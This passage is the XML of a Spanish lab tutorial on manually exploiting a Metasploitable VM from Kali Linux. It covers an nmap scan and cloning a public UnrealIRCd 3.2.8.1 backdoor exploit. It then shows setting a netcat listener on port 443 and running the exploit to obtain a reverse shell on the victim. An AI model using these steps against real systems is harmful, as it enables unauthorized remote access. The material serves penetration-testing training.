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FD80A" w14:textId="7E837087" w:rsidR="00090441" w:rsidRDefault="003C589D" w:rsidP="003C58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589D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Explotar Vulnerabilidades de Forma Manual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E975FB" w14:textId="77777777" w:rsidR="003C589D" w:rsidRDefault="003C589D" w:rsidP="003C589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BFB60B" w14:textId="4881F230" w:rsidR="003C589D" w:rsidRDefault="003C589D" w:rsidP="003C589D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1-Abrimos nuestra maquina </w:t>
      </w:r>
      <w:r w:rsidRPr="003C589D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>mestasploitable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597596A6" w14:textId="2742A750" w:rsidR="003C589D" w:rsidRDefault="003C589D" w:rsidP="003C589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Debemos comprobar que tenemos conexión para eso hacemos un pinc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6742E086" w14:textId="0C39FAD5" w:rsidR="003C589D" w:rsidRDefault="003C589D" w:rsidP="003C589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2-Ahora abrimos Kali Linux </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BD11A8" w14:textId="77777777" w:rsidR="00335773" w:rsidRDefault="003C589D" w:rsidP="0033577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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E02BC5C" w14:textId="2A505AED" w:rsidR="00335773" w:rsidRP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──(root</w:t>
      </w:r>
      <w:r w:rsidRPr="00335773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335773">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>kali)-[/home/kali]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F853D5" w14:textId="3FFD3FF4" w:rsidR="003C589D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└─# pin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">g </w:t>
      </w:r>
      <w:r w:rsidRPr="00335773">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -c 1 192.168.1.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0567F90B" w14:textId="5A08057F" w:rsid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Vemos que tenemos conectividad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAAD296" w14:textId="77777777" w:rsidR="00335773" w:rsidRP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┌──(kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00335773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335773">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>kali)-[~]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565D88AD" w14:textId="77777777" w:rsidR="00335773" w:rsidRP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└─$ ping -c 1 192.168.1.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5139ED" w14:textId="77777777" w:rsidR="00335773" w:rsidRP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PING 192.168.1.9 (192.168.1.9) 56(84) bytes of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10281437" w14:textId="77777777" w:rsidR="00335773" w:rsidRP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64 bytes from 192.168.1.9: icmp_seq=1 ttl=64 time=71.2 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9C30A9" w14:textId="77777777" w:rsidR="00335773" w:rsidRP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</w:p>
    <w:p w14:paraId="3F03A374" w14:textId="77777777" w:rsidR="00335773" w:rsidRP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--- 192.168.1.9 ping statistics ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A26DE3" w14:textId="77777777" w:rsidR="00335773" w:rsidRP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1 packets transmitted, 1 received, 0% packet loss, time 0ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5D0221" w14:textId="375E61A7" w:rsid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 w:rsidRPr="00335773">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>rtt min/avg/max/mdev = 71.174/71.174/71.174/0.000 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C944B8" w14:textId="77777777" w:rsid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</w:p>
    <w:p w14:paraId="3BA0F5BD" w14:textId="581CA9E3" w:rsidR="00335773" w:rsidRDefault="00335773" w:rsidP="0033577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4- Ahora vamos a </w:t>
      </w:r>
      <w:r w:rsidR="00B90E33">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>utilizar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> un exploit de Python para la</w:t>
      </w:r>
      <w:r w:rsidR="00B90E33">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nzar un ataque a esta maquina victima y  poder ganar acceso remoto, poder hackearla.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62582AF7" w14:textId="77777777" w:rsidR="00B90E33" w:rsidRDefault="00B90E33" w:rsidP="00335773">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B930450" w14:textId="53004789" w:rsidR="00B90E33" w:rsidRDefault="00B90E33" w:rsidP="0033577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5- hacemos un escaneo con nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653B1F83" w14:textId="77777777" w:rsidR="00B90E33" w:rsidRPr="00B90E33" w:rsidRDefault="00B90E33" w:rsidP="00B90E33">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90E33">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>──(root</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90E33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B90E33">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>kali)-[/home/kali/Desktop]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237D8C56" w14:textId="77777777" w:rsidR="00BB23FA" w:rsidRDefault="00B90E33" w:rsidP="00B90E33">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90E33">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">└─# nmap -p- -sV -sC --open -sS -vvv -n -Pn 192.168.1.9         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2834C7CC" w14:textId="6BEA0955" w:rsidR="00B90E33" w:rsidRDefault="00BB23FA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6- en este caso vamos a tomar un puerto que tiene una vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206994D8" w14:textId="5D11592E" w:rsidR="00BB23FA" w:rsidRDefault="00BB23FA" w:rsidP="00B90E33">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB23FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6667/tcp  open  irc         syn-ack ttl 64 UnrealIRCd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0380CF" w14:textId="77777777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</w:p>
    <w:p w14:paraId="0A728CB2" w14:textId="041E7F3D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7- Buscamos en Google si existe una herramienta para hackear esa vulnerabilidad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3253DE23" w14:textId="740B62F3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Buscamos de esta manera:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EBE123" w14:textId="1ED532D2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Github </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB23FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>UnrealIRCd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> how to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BAF462" w14:textId="77777777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</w:p>
    <w:p w14:paraId="128A2C68" w14:textId="7C88C7F7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Seleccionamos este:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2359815E" w14:textId="69785FCF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  <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00963698">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1055966A" w14:textId="12789DC6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repositorio encontramos un </w:t>
      </w:r>
      <w:r w:rsidR="00F00D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>archivo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753C982C" w14:textId="6E13857D" w:rsidR="00F00D10" w:rsidRDefault="00F00D10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exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF20BCD" w14:textId="6667A3D5" w:rsidR="00F00D10" w:rsidRDefault="00F00D10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1-clonamos el repositorio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BCB177" w14:textId="0114077E" w:rsidR="00F00D10" w:rsidRDefault="00F00D10" w:rsidP="00B90E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2-nos ubicamos en el escritorio en Kali Linux o bueno donde se quiera guardar , en mi caso en el escritorio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776A402D" w14:textId="77777777" w:rsidR="00F00D10" w:rsidRPr="00F00D10" w:rsidRDefault="00F00D10" w:rsidP="00F00D10">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F00D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>┌──(root</w:t>
      </w:r>
      <w:r w:rsidRPr="00F00D10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F00D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>kali)-[/home/kali/Desktop]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E338435" w14:textId="7138CC09" w:rsidR="00F00D10" w:rsidRDefault="00F00D10" w:rsidP="00F00D10">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F00D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">└─# git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00963698">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="68660A03" w14:textId="4E6D98B9" w:rsidR="00F00D10" w:rsidRDefault="00F00D10" w:rsidP="00F00D1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 hacemos un ls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5DAF49" w14:textId="77777777" w:rsidR="00F00D10" w:rsidRPr="00F00D10" w:rsidRDefault="00F00D10" w:rsidP="00F00D10">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F00D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>┌──(root</w:t>
      </w:r>
      <w:r w:rsidRPr="00F00D10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F00D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>kali)-[/home/kali/Desktop]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1A35B8" w14:textId="77777777" w:rsidR="00F00D10" w:rsidRPr="00F00D10" w:rsidRDefault="00F00D10" w:rsidP="00F00D10">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F00D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>└─# ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6539DD9D" w14:textId="2E8BC882" w:rsidR="00F00D10" w:rsidRDefault="00F00D10" w:rsidP="00F00D10">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F00D10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>UnrealIRCd-3.2.8.1-Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6A403C" w14:textId="0DC5F544" w:rsidR="008B432B" w:rsidRDefault="008B432B" w:rsidP="00F00D1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4- Nos ubicamos dentro de el:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA050C6" w14:textId="77777777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┌──(root</w:t>
      </w:r>
      <w:r w:rsidRPr="008B432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B432B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>kali)-[/home/kali/Desktop]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192942C9" w14:textId="7347A4D4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└─# cd UnrealIRCd-3.2.8.1-Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDFB9A5" w14:textId="28709EEE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 muestra que estamos dentro:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABBA381" w14:textId="77777777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lastRenderedPageBreak/>
        <w:t>┌──(root</w:t>
      </w:r>
      <w:r w:rsidRPr="008B432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B432B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>kali)-[/home/kali/Desktop/UnrealIRCd-3.2.8.1-Backdoor]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71017B97" w14:textId="7B7C5CDC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└─#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCD995D" w14:textId="606A5524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5- hacemos ls, vemos que el archivo se encuentra en  color rojo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C7A3F8" w14:textId="77777777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┌──(root</w:t>
      </w:r>
      <w:r w:rsidRPr="008B432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B432B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>kali)-[/home/kali/Desktop/UnrealIRCd-3.2.8.1-Backdoor]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EA62CC" w14:textId="77777777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└─# ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD0B978" w14:textId="1FDCEFC6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exploit.py  README.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326D7C1B" w14:textId="77777777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</w:p>
    <w:p w14:paraId="20A2D8B7" w14:textId="482DAA6B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6- Para ejecutar un exploit debemos darle permisos de ejecución:</w:t>
      </w:r>
      <w:r w:rsidRPr="008B432B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2260B0E9" w14:textId="77777777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┌──(root</w:t>
      </w:r>
      <w:r w:rsidRPr="008B432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B432B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>kali)-[/home/kali/Desktop/UnrealIRCd-3.2.8.1-Backdoor]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB1D656" w14:textId="77777777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 xml:space="preserve">└─# chmod +x exploit.py </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E4E7E8" w14:textId="77777777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</w:p>
    <w:p w14:paraId="69CB7B2D" w14:textId="427D0950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7- De nuevo hacemos un ls , vemos que el archivo </w:t>
      </w:r>
      <w:r w:rsidRPr="008B432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 puso de color verde:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522E4588" w14:textId="77777777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┌──(root</w:t>
      </w:r>
      <w:r w:rsidRPr="008B432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B432B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>kali)-[/home/kali/Desktop/UnrealIRCd-3.2.8.1-Backdoor]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542E474D" w14:textId="77777777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└─# ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E235A94" w14:textId="0E722719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exploit.py  README.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E64373" w14:textId="77777777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</w:p>
    <w:p w14:paraId="36F7CE40" w14:textId="58A6D826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 ahora debemos ingresar dentro del exploit porque algunas veces toca hacer algunas modificaciones, poner nuestra IP, o la IP objetivo , o el puerto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B432520" w14:textId="77777777" w:rsidR="008B432B" w:rsidRP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>┌──(root</w:t>
      </w:r>
      <w:r w:rsidRPr="008B432B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8B432B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>kali)-[/home/kali/Desktop/UnrealIRCd-3.2.8.1-Backdoor]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263471FD" w14:textId="77777777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 xml:space="preserve">└─# nano exploit.py </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D81849" w14:textId="77777777" w:rsidR="00243DAC" w:rsidRDefault="008B432B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9- vemos que en este caso nos pide la IP y el</w:t>
      </w:r>
      <w:r w:rsidR="00243D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puerto de escucha</w:t>
      </w:r>
      <w:r w:rsidRPr="008B432B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00243DAC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A49A131" w14:textId="2FBE7467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caso ponemos nuestra IP y el puerto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B738CF" w14:textId="04CA0270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192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F6130B" w14:textId="636ABE7E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443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4F71D7" w14:textId="77777777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travez de este puerto se nos va a enviar la Shell reverse a nuestro equipo que esta escuchando con netcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C3B431" w14:textId="77777777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Ahora guardamos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C00593" w14:textId="77777777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Ctrl o</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A1B03E" w14:textId="53F2F484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Enter </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2535675D" w14:textId="38348AD6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Ctrl x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A42860" w14:textId="275D1D9C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Listo tenemos el exploit guardado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAE1B8B" w14:textId="77777777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</w:p>
    <w:p w14:paraId="218FA895" w14:textId="65638A13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10- ponemos el siguiente comando con la dirección IP objetivo y el puerto por donde corre este servicio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC309D4" w14:textId="77777777" w:rsidR="00EC4E23" w:rsidRDefault="00EC4E23" w:rsidP="008B432B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D663E6A" w14:textId="66B8DC62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Antes de lanzar este exploit debemos ponernos en eschucha en nuestro equipo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE69D59" w14:textId="644255DC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Abrimos otra pestaña y ponemos :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6753CA59" w14:textId="2C38CE63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Aquies donde vamos a recibir el control del equipo victima, la Shell reverse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396284D6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┌──(root</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4E23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EC4E23">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>kali)-[/home/kali]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53359CFE" w14:textId="138EE714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└─# nc -nlvp 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660479A2" w14:textId="77777777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</w:p>
    <w:p w14:paraId="78BF76ED" w14:textId="03618458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11- Ahora si lanzamos el ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C39154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┌──(root</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4E23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EC4E23">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>kali)-[/home/kali/Desktop/UnrealIRCd-3.2.8.1-Backdoor]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AB047B" w14:textId="77777777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└─# ./exploit.py 192.168.1.9 6667 -payload netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB1B145" w14:textId="77777777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</w:p>
    <w:p w14:paraId="11CF3B44" w14:textId="1BCF10FC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12- Nos muestra que el exploit fue enviado correctamente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6427AB16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┌──(root</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4E23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EC4E23">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>kali)-[/home/kali/Desktop/UnrealIRCd-3.2.8.1-Backdoor]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DB6460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lastRenderedPageBreak/>
        <w:t>└─# ./exploit.py 192.168.1.9 6667 -payload netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA69A9A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</w:p>
    <w:p w14:paraId="1E6DA2FC" w14:textId="2185FD15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Exploit sent successfully!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAB61F0" w14:textId="77777777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</w:p>
    <w:p w14:paraId="30F2D213" w14:textId="5DB2E515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13- Ahora regresamos a la pestaña donde estamos en escucha:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B0A1D9" w14:textId="36BA52B5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vemos que tenemos acceso remoto a la maquina victima , hemos recibido correctamente la Shell reverse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786F4A06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┌──(root</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4E23">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4E23">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>kali)-[/home/kali]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6077C4A2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└─# nc -nlvp 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBF6FD0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listening on [any] 443 ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64316D28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  <w:r w:rsidRPr="00EC4E23">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>connect to [192.168.1.10] from (UNKNOWN) [192.168.1.9] 56271</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CB410D" w14:textId="77777777" w:rsid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</w:p>
    <w:p w14:paraId="6869AF45" w14:textId="69F70442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14- Ahora hacemos ls, para ver los archivos que están en la maquina victima:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626B0DAE" w14:textId="0AFE37BB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Pues nos muestra la información de ese equipo como si lo tuviéramos enfrente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608E8F6A" w14:textId="77777777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</w:p>
    <w:p w14:paraId="7B551F95" w14:textId="189BA705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15- hacemos un :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F264E2" w14:textId="582F3F8B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pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132200BA" w14:textId="27A5A08C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 muestra la ubicación donde nos encontramos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42201F34" w14:textId="4671923C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Podemos hacer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450286C0" w14:textId="2B203B8C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cd /home</w:t>
